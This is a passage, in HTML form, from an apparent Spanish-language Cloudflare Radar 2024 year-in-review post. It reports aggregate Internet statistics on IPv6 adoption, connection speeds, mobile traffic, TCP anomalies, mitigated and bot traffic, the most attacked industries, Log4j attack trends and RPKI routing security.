la mitad se debieron a interrupciones impuestas por los gobiernos. Si se selecciona un país/región, solo se mostrarán las interrupciones y los motivos de ese país/región.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/VDxaH2IkD28RXrcStCn8j/39ce7ad40f6a3d59e155ff09664f80e0/connectivity_-_Internet_outage_map.png" />
          </figure><p><i><sup>Se observaron más de 200 interrupciones de Internet en todo el mundo durante 2024</sup></i></p>
    <div>
      <h3>En 2024, el 28,5 % de las solicitudes que admiten IPv6 se hicieron a través de IPv6. India y Malasia fueron los países más fuertes, con un 68,9 % y un 59,6 % de adopción de IPv6, respectivamente.</h3>
      <a href="#en-2024-el-28-5-de-las-solicitudes-que-admiten-ipv6-se-hicieron-a-traves-de-ipv6-india-y-malasia-fueron-los-paises-mas-fuertes-con-un-68-9-y-un-59-6-de-adopcion-de-ipv6-respectivamente">
        
      </a>
    </div>
    <p>El protocolo IPv4 que aún utilizan muchos dispositivos conectados a Internet se desarrolló en la década de 1970, y no fue diseñado para manejar la vasta y creciente escala de la Internet moderna. En diciembre de 1995 se publicó una <a href="https://www.rfc-editor.org/rfc/rfc1883"><u>especificación inicial para su sucesor</u></a>, IPv6, que tres años más tarde se convirtió en un <a href="https://www.rfc-editor.org/rfc/rfc2460"><u>proyecto de norma</u></a> que ofrecía un espacio de direcciones ampliado para admitir mejor el crecimiento previsto de dispositivos conectados a Internet. En este momento, el espacio de IPv4 disponible hace tiempo que se ha <a href="https://ipv4.potaroo.net/"><u>agotado</u></a>, y los proveedores de conectividad utilizan soluciones como <a href="https://en.wikipedia.org/wiki/Network_address_translation"><u>traducción de direcciones de red</u></a> para ampliar los recursos limitados de IPv4. Los proveedores de servicios de nube y alojamiento, cada vez más ávidos de espacio de direcciones IPv4 a medida que crecen sus negocios e infraestructura, están adquiriendo bloques de espacio de direcciones IPv4 por <a href="https://auctions.ipv4.global/"><u>un precio que oscila entre los 30 y los 50 dólares por dirección</u></a>. </p><p>Cloudflare es un firme y activo defensor de IPv6 desde 2011, cuando anunciamos nuestra <a href="https://blog.cloudflare.com/introducing-cloudflares-automatic-ipv6-gatewa/"><u>gateway IPv6 automática</u></a>, que permitía la compatibilidad gratuita con IPv6 para todos nuestros clientes. En 2014, habilitamos <a href="https://blog.cloudflare.com/i-joined-cloudflare-on-monday-along-with-5-000-others"><u>la compatibilidad con IPv6 de forma predeterminada para todos nuestros clientes</u></a>, pero no todos deciden mantenerla habilitada por diversas razones. Hay que tener en cuenta que la compatibilidad con el servidor es solo la mitad de la ecuación para impulsar la adopción de IPv6, ya que las conexiones de los usuarios finales también deben ser compatibles. (En realidad, es un poco más complejo que eso, pero la compatibilidad con el servidor y con el cliente en todas las aplicaciones, sistemas operativos y entornos de red son los dos requisitos principales. Desde la perspectiva de la red, la implementación de IPv6 también aporta otras <a href="https://www.catchpoint.com/benefits-of-ipv6"><u>ventajas</u></a>). Al analizar la versión IP utilizada para cada solicitud que se hace a Cloudflare, agregada durante el año, podemos obtener información sobre la distribución del tráfico por las distintas versiones del protocolo.</p><p>A <a href="https://radar.cloudflare.com/year-in-review/2024#ipv6-adoption"><u>nivel global</u></a>, el 28,5 % de las solicitudes compatibles con <a href="https://www.techopedia.com/definition/19025/dual-stack-network"><u>IPv6 (doble pila)</u></a> se hicieron a través de IPv6, frente al 26,4 % en <a href="https://radar.cloudflare.com/year-in-review/2024?previousYear=true"><u>2023</u></a>. <a href="https://radar.cloudflare.com/year-in-review/2024/in#ipv6-adoption"><u>India</u></a> fue de nuevo el país con el mayor nivel de adopción de IPv6, con un 68,9 %, en gran medida debido al <a href="https://radar.cloudflare.com/adoption-and-usage/as55836?dateStart=2024-01-01&amp;dateEnd=2024-12-01"><u>94 % de adopción de IPv6 en Reliance Jio</u></a>, uno de los mayores proveedores de acceso a Internet del país.A la India le siguió de cerca <a href="https://radar.cloudflare.com/year-in-review/2024/my#ipv6-adoption"><u>Malasia</u></a>, donde el 59,6 % de las solicitudes de doble pila se hicieron a través de IPv6 durante 2024, debido a los <a href="https://radar.cloudflare.com/explorer?dataSet=http&amp;groupBy=ases&amp;loc=MY&amp;dt=14d&amp;metric=ip_version%2FIPv6"><u>altos índices de adopción de IPv6 de los principales proveedores</u></a> de Internet del país. La adopción de IPv6 en la India aumentó del 66 % en <a href="https://radar.cloudflare.com/year-in-review/2024/in?previousYear=true#ipv6-adoption"><u>2023,</u></a> y en Malasia, del 57,3 % <a href="https://radar.cloudflare.com/year-in-review/2024/my?previousYear=true#ipv6-adoption"><u>el año</u></a> pasado. <a href="https://radar.cloudflare.com/year-in-review/2024/sa#ipv6-adoption"><u>Arabia Saudita</u></a> fue el único otro país con un índice de adopción de IPv6 superior al 50 % este año, con un 51,8 %, mientras que esa lista también incluía a <a href="https://radar.cloudflare.com/year-in-review/2023/vn#ipv6-adoption"><u>Vietnam,</u></a><a href="https://radar.cloudflare.com/year-in-review/2023/gr#ipv6-adoption"></a>Grecia, <a href="https://radar.cloudflare.com/year-in-review/2023/fr#ipv6-adoption"></a>Francia, <a href="https://radar.cloudflare.com/year-in-review/2023/uy#ipv6-adoption"><u>Uruguay</u></a> y <a href="https://radar.cloudflare.com/year-in-review/2023/th#ipv6-adoption"><u>Tailandia</u></a> en 2023.Treinta y cuatro países/regiones, entre estos muchos de África, siguen teniendo índices de adopción de IPv6 inferiores al 1 %, mientras que un total de 96 países/regiones tienen índice de adopción inferiores al 10 %.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/48L0qRLujnWQRuJ8ZMa8Ed/ac5209577812dd556d275279d4740041/connectivity_-_IPv6_adoption.png" />
          </figure><p><i><sup>Distribución global del tráfico por versión de IP en 2024</sup></i></p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/NjeXm7lfs7ZGM3Gn5ToZM/3b401894664cb22347db1a8d8a2bfdc8/connectivity_-_IPv6_adoption_top_5.png" />
          </figure><p><i><sup>Países/regiones con el mayor porcentaje de tráfico IPv6 en 2024</sup></i></p>
    <div>
      <h3>Los 10 principales países clasificados por velocidad de Internet tuvieron velocidades de descarga promedio superiores a 200 Mbps. España estuvo sistemáticamente entre los primeros en cuanto a métricas de calidad de Internet. </h3>
      <a href="#los-10-principales-paises-clasificados-por-velocidad-de-internet-tuvieron-velocidades-de-descarga-promedio-superiores-a-200-mbps-espana-estuvo-sistematicamente-entre-los-primeros-en-cuanto-a-metricas-de-calidad-de-internet">
        
      </a>
    </div>
    <p>A medida que cada vez más actividades de nuestra vida cotidiana se hacen en línea, como el entretenimiento, el trabajo, la educación, las finanzas, las compras e incluso la interacción social y personal básica, la calidad de nuestras conexiones a Internet es posiblemente más importante que nunca, lo que exige mayores velocidades de conexión y menor latencia. Si bien los proveedores de servicios de Internet continúan ampliando sus carteras de servicios para ofrecer mayores velocidades de conexión y menor latencia para apoyar el uso creciente como las videoconferencias, la transmisión en directo y los videojuegos en línea, la adopción por parte de los consumidores suele ser desigual debido al costo, la disponibilidad u otros problemas. Al agregar los resultados de las pruebas de<a href="https://speed.cloudflare.com/"><u>speed.cloudflare.com</u></a> que se hicieron durante 2024, podemos obtener una perspectiva geográfica de las métricas de <a href="https://developers.cloudflare.com/radar/glossary/#connection-quality"><u>calidad de la conexión</u></a>incluidas las velocidades promedio de carga y descarga, las latencias promedio inactivas y cargadas, y la distribución de las mediciones.</p><p>En <a href="https://radar.cloudflare.com/year-in-review/2024#internet-quality"><u>2024</u></a>, España fue líder en métricas de velocidad de descarga (292,6 Mbps) y velocidad de carga (192,6 Mbps), y ocupó el segundo lugar a nivel mundial en latencia cargada (78,6 ms). (La latencia de carga es el tiempo de ida y vuelta cuando se utilizan aplicaciones con muchos datos en la red). El liderazgo de España en estas métricas de calidad de la conexión se debe en gran medida al progreso que ha hecho el país <a href="https://ec.europa.eu/newsroom/dae/redirection/document/106695"><u>para lograr los objetivos de la "Década digital" de la UE</u></a>, como la implementación de la red fija de muy alta capacidad (VHCN), la cobertura de fibra hasta las instalaciones (FTTP), y la cobertura 5G,<a href="https://www.trade.gov/country-commercial-guides/spain-digital-economy"><u> alcanzando estas</u></a> dos últimas el 95,2 % y el 92,3 %, respectivamente. Las conexiones de banda ancha de fibra de alta velocidad también son relativamente asequibles, y las investigaciones demuestran que los principales proveedores ofrecen paquetes de 100 Mbps, 300 Mbps, 600 Mbps y 1 Gbps, con un precio que oscila entre 30 y 46 euros al mes. Las siguientes cifras de <a href="https://radar.cloudflare.com/year-in-review/2024/es#internet-quality"><u>España</u></a> muestran los mayores clusters de mediciones de velocidad en torno a los 100 Mbps, con ligeros saltos también visibles en torno a los 300 Mbps, lo que sugiere que el primer paquete tiene la tasa de suscripción más alta, seguido del segundo. Además, muestran que estas conexiones también tienen una latencia relativamente baja, con el 87 % de las mediciones de latencia en reposo por debajo de los 50 ms y el 65 % de las mediciones de latencia en carga por debajo de los 100 ms, lo que aporta a los usuarios buenas experiencias para <a href="https://www.screenbeam.com/wifihelp/wifibooster/how-to-reduce-latency-or-lag-in-gaming-2/#:~:text=Latency%20is%20measured%20in%20milliseconds,%2C%2020%2D40ms%20is%20optimal."><u>videojuegos</u></a> y <a href="https://www.haivision.com/glossary/video-latency/#:~:text=Low%20latency%20is%20typically%20defined,and%20streaming%20previously%20recorded%20events."><u>videoconferencias/streaming.</u></a>.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/51PcbNyPpAQX79gYg0SxIU/a784aaadd65822d3384f1463570a6129/connectivity_-_Spain_bandwidth.png" />
          </figure><p><i><sup>Distribución de la velocidad de carga/descarga medida en España en 2024</sup></i></p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3Refsg6ctWdHNzscsoIDDF/75da3336fa1e31fd71a2188787944a57/connectivity_-_Spain_latency.png" />
          </figure><p><i><sup>Distribución de la latencia inactiva/cargada medida en España en 2024</sup></i></p>
    <div>
      <h3>El 41,3 % del tráfico global proviene de dispositivos móviles. En casi 100 países/regiones, la mayor parte del tráfico proviene de dispositivos móviles.</h3>
      <a href="#el-41-3-del-trafico-global-proviene-de-dispositivos-moviles-en-casi-100-paises-regiones-la-mayor-parte-del-trafico-proviene-de-dispositivos-moviles">
        
      </a>
    </div>
    <p>Aproximadamente el <a href="https://www.statista.com/topics/840/smartphones/#topicOverview"><u>70 % de la población mundial utiliza teléfonos inteligentes</u></a> y el <a href="https://www.pewresearch.org/internet/fact-sheet/mobile/"><u>91 % de los estadounidenses tienen un teléfono inteligente</u></a>, por lo tanto, estos dispositivos móviles han pasado a ser fundamentales tanto para nuestra vida personal como profesional, facilitándonos el acceso a Internet desde prácticamente cualquier lugar y en cualquier momento. En algunos países/regiones, los dispositivos móviles se conectan a Internet principalmente a través de Wi-Fi, mientras que otros países/regiones son "mobile first", donde los servicios 4G/5G son el principal medio de acceso a Internet .</p><p>El análisis de la información del agente de usuario notificado con cada solicitud a Cloudflare nos permite clasificarla como procedente de un dispositivo móvil, de escritorio u otro tipo de dispositivo. Si agregamos esta clasificación durante el año a nivel <a href="https://radar.cloudflare.com/year-in-review/2024#mobile-vs-desktop"><u>global</u></a>, comprobamos que el 41,3 % del tráfico procedía de dispositivos móviles, y el 58,7 % de dispositivos de escritorio, como portátiles y PC "clásicos". Estos porcentajes de tráfico eran acordes con los medidos en <a href="https://radar.cloudflare.com/year-in-review/2023#mobile-vs-desktop"><u>2023</u></a> y 2022, lo que sugiere que el uso de dispositivos móviles ha alcanzado un "nivel de estabilidad". Más del 77 % del tráfico proviene de dispositivos móviles en <a href="https://radar.cloudflare.com/year-in-review/2024/sd#mobile-vs-desktop"><u>Sudán</u></a>, <a href="https://radar.cloudflare.com/year-in-review/2024/cu#mobile-vs-desktop"><u>Cuba</u></a> y <a href="https://radar.cloudflare.com/year-in-review/2024/sy#mobile-vs-desktop"><u>Siria</u></a>, lo que los convierte en los países/regiones con el mayor porcentaje de tráfico de dispositivos móviles en 2024. Otros países/regiones en los que más del 50 % del tráfico proviene de dispositivos móviles se concentran en Oriente Medio/África, la región de Asia Pacífico y América del Sur/Central. </p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/9bsuRwzYBybYpOiKqwLja/cbdafb60eab1913a91ec916899d1e807/connectivity_-_mobile_desktop.png" />
          </figure><p><i><sup>Distribución global del tráfico por tipo de dispositivo en 2024</sup></i></p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/KRujuREGMTBvLHVAHonuU/ad575fdd822ee3ee0bcabd41a96ef736/connectivity_-_mobile_desktop_top_5.png" />
          </figure><p><i><sup>Países/regiones con mayor porcentaje de uso de dispositivos móviles en 2024</sup></i></p>
    <div>
      <h3>El 20,7 % de las conexiones TCP se interrumpen de manera inesperada antes de que sea posible intercambiar datos útiles.</h3>
      <a href="#el-20-7-de-las-conexiones-tcp-se-interrumpen-de-manera-inesperada-antes-de-que-sea-posible-intercambiar-datos-utiles">
        
      </a>
    </div>
    <p>Cloudflare se encuentra en una posición única para ayudar a medir el estado y el comportamiento de las redes de Internet en todo el mundo. Una forma de hacerlo es midiendo de forma pasiva las velocidades de las conexiones a Cloudflare que parecen <i>anómalas</i>, es decir que se interrumpen de manera inesperada antes de que sea posible intercambiar datos útiles. Las causas subyacentes de las anomalías de conexión son variadas y van desde ataques DoS hasta comportamientos extraños de los clientes y la manipulación de conexiones por parte de terceros (por ejemplo, cuando una red supervisa e interrumpe selectivamente las conexiones para filtrar contenido).</p><p>Las anomalías de conexión son síntomas, signos visibles de que "algo anormal" está ocurriendo en una red, pero la causa subyacente no siempre está clara desde el principio. Sin embargo, podemos comprenderlos mejor incorporando los comportamientos de red informados previamente, las mediciones activas y los informes sobre el terreno, y macrotendencias en todas las redes. Puedes encontrar más detalles sobre este análisis en las publicaciones del blog <a href="https://blog.cloudflare.com/connection-tampering/"><i><u>Una evaluación global de la manipulación de conexiones por parte de terceros</u></i></a> y<a href="https://blog.cloudflare.com/tcp-resets-timeouts/"><i><u>Información sobre reinicios y tiempos de espera de TCP en Cloudflare Radar</u></i></a>.</p><p>La información sobre las anomalías en conexiones TCP se <a href="https://blog.cloudflare.com/tcp-resets-timeouts/"><u>publicó en Cloudflare Radar</u></a> en septiembre, y las líneas del gráfico asociado corresponden a la fase de la conexión TCP en la que la conexión se interrumpió de forma anómala (para abreviar, los tres primeros mensajes que solemos recibir del cliente en una conexión TCP son paquetes "SYN" y "ACK" para establecer una conexión, y luego un paquete "PSH" que indica el recurso solicitado). En conjunto, a <a href="https://radar.cloudflare.com/year-in-review/2024#tcp-connection-anomalies"><u>nivel mundial</u></a>, más del 20 % de las conexiones a Cloudflare se interrumpieron de forma inesperada, y la mayor parte (casi la mitad) se cerraron "Post SYN", es decir, después de que nuestro servidor recibiera un paquete SYN del cliente, pero antes de que recibiéramos un reconocimiento (ACK) posterior del cliente o cualquier dato útil que siguiera al reconocimiento. Estas terminaciones a menudo se pueden atribuir a ataques DoS o a exploraciones de Internet . Las anomalías posteriores a ACK (3,1 % a nivel mundial) y posteriores a PSH (1,4 % a nivel mundial) se asocian con mayor frecuencia con la manipulación de conexiones, especialmente cuando se producen a un ritmo elevado en redes específicas.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/11XcEAXkMgOhytTbCsf21J/159fa2459ebc6b9c268bd5d8455213ba/connectivity_-_TCP_connection_anomalies.png" />
          </figure><p><i><sup>Tendencias de las anomalías de conexión TCP por etapas en 2024</sup></i></p>
    <div>
      <h2>Seguridad</h2>
      <a href="#seguridad">
        
      </a>
    </div>
    
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4CkCPZHGlR8gQQQrXt0b5H/cfd3faabbe406fd348b8751825bc43e5/2627_Shield_Globe.png" />
          </figure>
    <div>
      <h3>El 6,5 % del tráfico global fue mitigado por los sistemas de Cloudflare como potencialmente malicioso o por razones definidas por el cliente.</h3>
      <a href="#el-6-5-del-trafico-global-fue-mitigado-por-los-sistemas-de-cloudflare-como-potencialmente-malicioso-o-por-razones-definidas-por-el-cliente">
        
      </a>
    </div>
    <p>Para <a href="https://www.cloudflare.com/products/zero-trust/threat-defense/"><u>proteger a los clientes de las amenazas</u></a> que plantean los bots maliciosos utilizados para atacar sitios web y aplicaciones, Cloudflare mitiga este tráfico de ataque con técnicas de mitigación de <a href="https://www.cloudflare.com/learning/ddos/what-is-a-ddos-attack/"><u>DDoS</u></a><a href="https://developers.cloudflare.com/waf/managed-rules/"><u>o reglas administradas del firewall de aplicaciones web (WAF)</u></a>. Por otras razones, los clientes también pueden necesitar que Cloudflare mitigue el tráfico utilizando técnicas como la <a href="https://developers.cloudflare.com/waf/rate-limiting-rules/"><u>limitación de velocidad de</u></a> las solicitudes o <a href="https://developers.cloudflare.com/waf/tools/ip-access-rules/"><u>el bloqueo de todo el tráfico de una ubicación determinada</u></a>, incluso si no es malicioso. Al analizar el tráfico a la red de Cloudflare durante 2024, observamos el porcentaje total que se mitigó por cualquier motivo, así como el porcentaje que se bloqueó como un ataque DDoS o por reglas administradas por WAF . </p><p>En 2024, <a href="https://radar.cloudflare.com/year-in-review/2024#mitigated-traffic"><u>se mitigó el 6,5 % del tráfico global</u></a>, casi un punto porcentual más que <a href="https://radar.cloudflare.com/year-in-review/2023#mitigated-traffic"><u>en 2023</u></a>. Solo el 3,2 % se mitigó como ataque DDoS, o por reglas administradas por WAF, una tasa ligeramente superior a la de 2023. A más del 10 % del tráfico procedente de 44 países/regiones se les aplicaron mitigaciones de DDoS/WAF en general, mientras que las mitigaciones de DDoS/ WAF se aplicaron a más del 10 % del tráfico procedente de solo siete países/regiones.</p><p>A nivel de país/región, <a href="https://radar.cloudflare.com/year-in-review/2024/al?#mitigated-traffic"><u>Albania</u></a> tuvo uno de los mayores porcentajes de tráfico mitigado a lo largo del año, con un 42,9 %, mientras que <a href="https://radar.cloudflare.com/year-in-review/2024/ly#mitigated-traffic"><u>Libia</u></a> tuvo uno de los mayores porcentajes de tráfico mitigado como un ataque DDoS o mediante reglas administradas por WAF, con un 19,2 %.. En la publicación del blog del Resumen del año <a href="https://blog.cloudflare.com/radar-2023-year-in-review/#just-under-6-of-global-traffic-was-mitigated-by-cloudflares-systems-as-being-potentially-malicious-or-for-customer-defined-reasons-in-the-united-states-3-65-of-traffic-was-mitigated-while-in-south-korea-it-was-8-36"></a>2023, destacamos a Estados Unidos y Corea. Este año, el porcentaje de tráfico mitigado creció hasta el 5,0 % en <a href="https://radar.cloudflare.com/year-in-review/2024/us?#mitigated-traffic"><u>Estados Unidos</u></a> (frente al 3,65 % en 2023), mientras que en <a href="https://radar.cloudflare.com/year-in-review/2024/kr?#mitigated-traffic"><u>Corea del Sur</u></a> cayó ligeramente al 8,1 %, frente al 8,36 %.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3GJ5r18m6Tpor4n2scVRQ5/cc85d08dc2aa496d677d8bfc9439417d/security_-_mitigated_traffic_worldwide.png" />
          </figure><p><i><sup>Tendencias del tráfico mitigado en todo el mundo en 2024</sup></i></p>
    <div>
      <h3>Más de un tercio del tráfico global de bots provino de Estados Unidos. El 12,7 % del tráfico global de bots provino de Amazon Web Services, y el 7,8 % de Google. </h3>
      <a href="#mas-de-un-tercio-del-trafico-global-de-bots-provino-de-estados-unidos-el-12-7-del-trafico-global-de-bots-provino-de-amazon-web-services-y-el-7-8-de-google">
        
      </a>
    </div>
    <p>El tráfico de<a href="https://www.cloudflare.com/learning/bots/what-is-a-bot/"><u>bots</u></a> describe cualquier tráfico de Internet no humano, y mediante el control de tráfico que se sospecha que proviene de bots, los propietarios de sitios y aplicaciones pueden detectar y, si es necesario, bloquear actividades potencialmente maliciosas. Sin embargo, no todos los bots son maliciosos — los bots también pueden ser útiles, y Cloudflare mantiene una lista de <a href="https://radar.cloudflare.com/traffic/verified-bots"><u>bots verificados</u></a> que incluye los que se utilizan para cosas como la indexación de motores de búsqueda, las pruebas de rendimiento y la <a href="https://www.cloudflare.com/application-services/solutions/app-performance-monitoring/"><u>supervisión de la disponibilidad</u></a>. Independientemente de la intención, analizamos de dónde se originaba el tráfico de bots en 2024, utilizando la dirección IP de una solicitud para identificar la red (<a href="https://www.cloudflare.com/learning/network-layer/what-is-an-autonomous-system/"><u>sistema autónomo</u></a>) y el país/región asociados con el bot que hacía la solicitud. Las plataformas en la nube se mantuvieron entre las principales fuentes de tráfico de bots debido a una serie de factores. Estos incluyen la facilidad de uso de herramientas automatizadas para aprovisionar rápidamente los recursos informáticos, el costo relativamente bajo de utilizar estos recursos informáticos de forma efímera, el espacio geográfico ampliamente distribuido de las plataformas en la nube y la conectividad a Internet con gran ancho de banda de las plataformas.</p><p><a href="https://radar.cloudflare.com/year-in-review/2024#bot-traffic-sources"><u>A nivel mundial</u></a>, 68,5 % del tráfico de bots observado procedía de los 10 principales países en 2024, siendo Estados Unidos responsable de la mitad de ese total, más de 5 veces la participación de Alemania, que ocupa el segundo lugar. (En comparación con 2023, la participación de Estados Unidos aumentó ligeramente, mientras que la de Alemania disminuyó ligeramente). Entre las plataformas en la nube que originan el tráfico de bots, Amazon Web Services fue responsable del 12,7 % del tráfico global de bots, y el 7,8 % procedía de Google. Microsoft, Hetzner, Digital Ocean y OVH también contribuyeron con más del 1 % cada una.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3qlyS355w5LDtoBDtb1qXE/8354c2b07c0af46121a0c667e6d687e4/security_-_bot_distribution_by_source_country.png" />
          </figure><p><i><sup>Distribución de tráfico de bots a nivel global por país de origen.</sup></i></p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6euMUlCDcfOInLiCpssg2t/54eb345624346f24ab984bbe6b1c9f67/security_-_bot_distribution_by_source_network.png" />
          </figure><p><i><sup>Distribución de tráfico de bots a nivel global por red de origen.</sup></i></p>
    <div>
      <h3>A nivel mundial, el sector de apuestas/videojuegos fue el más afectado, un poco por delante del sector financiero, que fue el más afectado en 2023.</h3>
      <a href="#a-nivel-mundial-el-sector-de-apuestas-videojuegos-fue-el-mas-afectado-un-poco-por-delante-del-sector-financiero-que-fue-el-mas-afectado-en-2023">
        
      </a>
    </div>
    <p>Las industrias objetivo de los ataques suelen cambiar con el tiempo, según el propósito de los atacantes. Es posible que quieran causar daños financieros al atacar a sitios de comercio electrónico durante un intenso período de compras, o quizás la intención sea hacer una declaración política al atacar sitios relacionados con los gobiernos. Para identificar la actividad de los ataques a las industrias objetivo durante 2024, analizamos el tráfico mitigado de clientes que tenían una industria asociada y vertical en su registro de clientes. El tráfico mitigado se agregaba semanalmente por país/región de origen en 19 industrias objetivo.</p><p>Las empresas del sector de las apuestas/videojuegos fueron, en conjunto, las <a href="https://radar.cloudflare.com/year-in-review/2024#most-attacked-industries"><u>más afectadas durante 2024</u></a>, y el 6,6 % del tráfico global mitigado estaba dirigido a este sector. El sector superó ligeramente al sector financiero, que lideró la lista de 2023. (Ambos sectores se muestran con un 6,6 % en la vista Resumen debido al redondeo).  Los sitios de apuestas/videojuegos registraron la mayor parte del tráfico mitigado en enero y la primera semana de febrero, posiblemente relacionado con las eliminatorias de la Liga Nacional de Fútbol de Estados Unidos, antes del <a href="https://blog.cloudflare.com/super-bowl-lviii/"><u>Super Bowl</u></a>.</p><p>Los ataques contra organizaciones financieras fueron más activos en mayo, alcanzando un pico del 15,3 % del tráfico mitigado en la semana del 13 de mayo. Esto coincide con la cifra de nuestro <a href="https://radar.cloudflare.com/reports/ddos-2024-q2#id-9-top-attacked-industries"><i><u>informe sobre amenazas DDoS correspondiente al segundo trimestre de 2024,</u></i></a> que muestra que los servicios financieros fueron el sector más afectado por volumen de solicitudes durante el trimestre en Sudamérica y la región de Oriente Medio.</p><p>Como hemos visto en el pasado, los picos de actividad de los ataques variaron semanalmente según el sector. Los picos más altos del año se observaron en los ataques contra organizaciones de personas y sociedades (19,6 % del tráfico mitigado, semana del 1 de enero), el sector de automóviles y vehículos (29,7 % del tráfico mitigado, semana del 15 de enero) y el sector inmobiliario. (27,5 % del tráfico mitigado, semana del 26 de agosto).</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4qjMffdMn6uV7OEFhE5l0F/397672a455b62f712946e30130969657/security_-_targeted_industries.png" />
          </figure><p><i><sup>Participación en el tráfico mitigado a nivel mundial por sector en 2024, vista resumida</sup></i></p>
    <div>
      <h3>Log4j sigue siendo una amenaza constante y fue un objetivo activo durante 2024.</h3>
      <a href="#log4j-sigue-siendo-una-amenaza-constante-y-fue-un-objetivo-activo-durante-2024">
        
      </a>
    </div>
    <p>En diciembre de 2021, publicamos una <a href="https://blog.cloudflare.com/tag/log4j/"><u>serie de entradas en el blog sobre la vulnerabilidad Log4j</u></a>, destacando la amenaza que suponía, nuestras observaciones de intentos de explotación y las medidas que adoptamos para proteger a los clientes. Dos años después, en nuestro <a href="https://blog.cloudflare.com/radar-2023-year-in-review/"><u>Resumen del Año 2023</u></a>, observamos <a href="https://blog.cloudflare.com/radar-2023-year-in-review/#even-as-an-older-vulnerability-log4j-remained-a-top-target-for-attacks-during-2023-however-http-2-rapid-reset-emerged-as-a-significant-new-vulnerability-beginning-with-a-flurry-of-record-breaking-attacks"></a> que, a pesar de ser una vulnerabilidad anterior, Log4j siguió siendo uno de los principales objetivos de los ataques durante 2023, y la actividad de los ataques relacionados fue significativamente mayor que otras vulnerabilidades que se aprovechan comúnmente.</p><p>En 2024, tres años después de la revelación inicial de Log4j, descubrimos que Log4j sigue siendo una amenaza activa. Este año, comparamos la actividad de ataque diaria normalizada de Log4j con la actividad de ejecución remota de código por inyección de Atlassian Confluence, una vulnerabilidad que <a href="https://radar.cloudflare.com/year-in-review/2023#commonly-exploited-vulnerabilities"><u>examinamos en el Resumen del Año 2023</u></a>, así como la actividad de ataque diaria agregada para múltiples <a href="https://en.wikipedia.org/wiki/Common_Vulnerabilities_and_Exposures"><u>CVE</u></a> relacionadas con las vulnerabilidades de <a href="https://capec.mitre.org/data/definitions/115.html"><u>omisión de autenticación</u></a> y <a href="https://www.cloudflare.com/en-gb/learning/security/what-is-remote-code-execution/"><u>ejecución remota de código</u></a> publicadas en 2024.</p><p><a href="https://radar.cloudflare.com/year-in-review/2024#commonly-exploited-vulnerabilities"><u>La actividad de los ataques Log4j</u></a> pareció tender en general al alza a lo largo del año, con varios picos significativos visibles durante la primera mitad del año, y de nuevo en octubre y noviembre. En cuanto a la diferencia de actividad, Log4j oscila entre aproximadamente 4 y más de 20 veces la actividad observada para la inyección de código de Atlassian Confluence, y hasta 100 veces la actividad agregada observada para las vulnerabilidades de omisión de autenticación o inyección remota de código.  </p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2YdyQ3qMUh10zLAHLefcdU/8a723a1970652c293a1f6c59efe51a99/security_-_vulnerabilities_Log4J.png" />
          </figure><p><i><sup>Tendencias de actividad de ataques a nivel global para vulnerabilidades que se aprovechan comúnmente en 2024</sup></i></p>
    <div>
      <h3>La seguridad del enrutamiento, medida como porcentaje de rutas válidas RPKI y el porcentaje de espacio de direcciones IP cubierto, siguió mejorando a nivel global durante 2024. </h3>
      <a href="#la-seguridad-del-enrutamiento-medida-como-porcentaje-de-rutas-validas-rpki-y-el-porcentaje-de-espacio-de-direcciones-ip-cubierto-siguio-mejorando-a-nivel-global-durante-2024">
        
      </a>
    </div>
    <p>Como protocolo de enrutamiento que da sustento a Internet, <a href="https://www.cloudflare.com/learning/security/glossary/what-is-bgp/"><u>Border Gateway Protocol (BGP)</u></a> comunica las rutas entre redes, lo que permite que el tráfico fluya entre el origen y el destino. Sin embargo, como BGP depende de la confianza entre las redes, la información incorrecta compartida entre los pares se basa en la confianza entre redes, y la información incorrecta compartida entre pares, ya sea intencional o no, puede enviar el tráfico al lugar incorrecto, posiblemente con <a href="https://blog.cloudflare.com/bgp-leaks-and-crypto-currencies/"><u>resultados engañosos</u></a><a href="https://blog.cloudflare.com/rpki/"><u>Resource Public Key Infrastructure (RPKI)</u></a> es un método criptográfico de firma de registros que asocia un anuncio de ruta BGP con el número AS de origen correcto del sistema autónomo, lo que facilita una forma de garantizar que la información que se comparte originalmente proviene de una red con permiso para hacerlo. (Es importante tener en cuenta que esto es solo la mitad del desafío de implementar la seguridad de enrutamiento, ya que los proveedores de servicios de red también deben validar estas firmas y filtrar los anuncios no válidos para evitar que se sigan compartiendo).</p><p>Cloudflare ha sido durante mucho tiempo un arduo defensor de la seguridad de enrutamiento, ya que fue fundador participante de <a href="https://www.manrs.org/2020/03/new-category-of-cdns-and-cloud-providers-join-manrs-to-improve-routing-security/"><u>MANRS CDN y Cloud Programme</u></a> y suministra una <a href="https://isbgpsafeyet.com/"><u>herramienta pública</u></a> que permite a los usuarios probar si su proveedor de Internet ha implementado BGP de forma segura. Basándonos en la información disponible en la <a href="https://radar.cloudflare.com/routing"><u>página enrutamiento</u></a> de Cloudflare Radar, analizamos los datos del <a href="https://ftp.ripe.net/rpki/"><u>archivo diario de RPKI de RIPE NCC</u></a> para determinar el porcentaje de rutas válidas de RPKI (a diferencia de los anuncios de ruta que son <a href="https://rpki.readthedocs.io/en/latest/about/help.html"><u>inválidos o cuyo estado es desconocido</u></a>) y cómo esa participación ha cambiado durante 2024, así como determinar la participación de espacio de direcciones IP cubierto por rutas válidas. Esta última métrica es interesante, porque un anuncio de ruta que cubra una cantidad significativa de espacio de direcciones IP (millones de direcciones IPv4, por ejemplo) tiene un impacto potencial mayor que un anuncio que cubra un pequeño bloque de espacio de direcciones IP (cientos de direcciones IPv4, por ejemplo).</p><p>A nivel <a 